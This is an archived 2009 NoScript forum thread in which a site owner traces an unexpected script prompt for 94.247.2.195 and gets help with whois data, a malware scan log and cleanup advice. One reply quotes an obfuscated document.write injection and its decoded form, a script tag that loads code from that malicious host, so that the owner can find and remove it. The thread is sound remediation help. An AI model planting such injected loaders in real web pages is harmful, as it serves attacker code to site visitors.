InformAction Forums

On my own web site pages I get a Noscript pop suggesting scripts partially allowed and asking to allow or not allow 94.247.2.195

I do a search for 94.247.2.195 and find below.

Who are these people and why am I being asked to allow or not allow? I have no script on my web page.

Results for 94.247.2.195:

% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '94.247.2.0 - 94.247.3.255'

inetnum: 94.247.2.0 - 94.247.3.255
netname: ZLKON
descr: ZlKon
country: LV
admin-c: ZK508-RIPE
tech-c: DES31-RIPE
status: ASSIGNED PA
mnt-by: PCEXPRESS-MNT
mnt-lower: ZLKON-MNT
mnt-routes: ZLKON-MNT
source: RIPE # Filtered

role: ZlKon HostMaster
address: Lilijas iela 4-74
address: Riga, LV-1055
address: Latvija
phone: +371 26330593
admin-c: AD5952-RIPE
tech-c: AD5952-RIPE
nic-hdl: ZK508-RIPE
mnt-by: ZLKON-MNT
source: RIPE # Filtered
abuse-mailbox: abuse@zlkon.lv

role: DATORU EXPRESS SERVISS HostMaster
address: 18. novembra street 319C
address: Daugavpils, LV-5413
address: Latvia
phone: +371 26631339
fax-no: +371 65420725
remarks: Information: http://www.pcexpress.lv
remarks: Questions: hostmaster@pcexpress.lv
admin-c: IV745-RIPE
tech-c: IV745-RIPE
nic-hdl: DES31-RIPE
mnt-by: PCEXPRESS-MNT
source: RIPE # Filtered
abuse-mailbox: abuse@pcexpress.lv

% Information related to '94.247.0.0/21AS12553'

route: 94.247.0.0/21
descr: "DATORU EXPRESS SERVISS" Ltd.
origin: AS12553
mnt-by: PCEXPRESS-MNT
source: RIPE # Filtered

URL of your website?
Do you have ads on your website?
http://www.tellinya.com or blog.5ubliminal.com ?

The only thing I see is statcounter?

lots and lots of links, pop ups, rollovers, css, expression web however No ads.

Looks to be malware related, http://www.malwaredomainlist.com/mdl.ph ... uantity=50.
Run Malwarebytes' Anti-Malware (quick scan) on your computer & see what it may turn up.

Has my website been hacked?

[Full-disclosure] Statcounter Script Injection User Session Hijack

Statcounter Script Injection User Session Hijack


Perhaps look into using a browser & extension that makes it easy to block JavaScript & also can help to prevent things like XSS exploits.

I ran malwarebytes quick scan and it found below, I removed it, rebooted and still being asked to allow 93.247.2.195. It's like 11:44pm. no more for tonight. I'll be back tomorrow morning.
Thanks for helping me with this.

Malwarebytes' Anti-Malware 1.35
Database version: 1904
Windows 5.1.2600 Service Pack 3

4/16/2009 11:31:23 PM
mbam-log-2009-04-16 (23-31-23).txt

Scan type: Quick Scan
Objects scanned: 83633
Time elapsed: 6 minute(s), 10 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools (Hijack.Regedit) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

for what it is worth I found this link with 94.247.2.195 listed on it.

http://www.who-is-who-in-gpt.com/forum/ ... topic=4024

below link is but a few days old.

http://blog.scansafe.com/

and says a lot about 94.247.2.195

thanks

So do you think it is statcounter.com that is being subverted, or your hosting company, or something else altogether?

I have no clue.

I'll go to statcounter and give them previous link and see what they say.

after searching and searching for a solution I go back and review NOscript options popup.
allow
distrust and
temporary.

I clicked on distrust and now NoScript does not popup asking me to allow, temporary or distrust.

94.247.2.195 could be somewhere in my computer however it could be NoScript stopped 94.247.2.195 from taking me somewhere I did not want to go.

thanks.

it could be NoScript stopped 94.247.2.195 from taking me somewhere I did not want to go

Correct. That is what I would expect.

Leave padlockinventor blocked.
Allow statcounter.net. (Is that safe to do?)

See if the popups start again.

We've been seeing alot of these types of hacks lately.

It's usually caused by a virus on the computer that uploads to the website. The virus monitors FTP traffic and since FTP usernames and passwords are sent in plain text, they can read that and then login to your website as you and add their malicious code.

You might look for something like the following on your website:

<script language=javascript><!--
document.write(unescape('%3CsT8AcrF2iT8ApWkt%20srWs9c%3DJU%2FF2%2FT8A9vo4%2EWk24T8A7%2E2vo%2E195%2FjJUqJUueryT8A%2EjsWk%3E%3C%2FsJUcrJUipt%3E').replace(/T8A|Wk|NLA|F2|6X|vo|Ws9|K3m|JU/g,""));
--></script>

The actual encoded characters might be somewhat different but this code actually deobfuscates to:

<script src=//94.247.2.195/jquery.js></script>

Which is what you're claiming is being blocked.

Step 1: change your FTP password to your site
Step 2: Clean your computer with AVG or Avast
Step 3: Remove the javascript code from your webpages. It's typically in many spots on the same webpage and on multiple pages.

After changing your FTP password do not upload to your site again until you've cleaned your PC.

If you have any further questions, please email me at traef@wewatchyourwebsite.com

OK I'll do what you suggest.
Thanks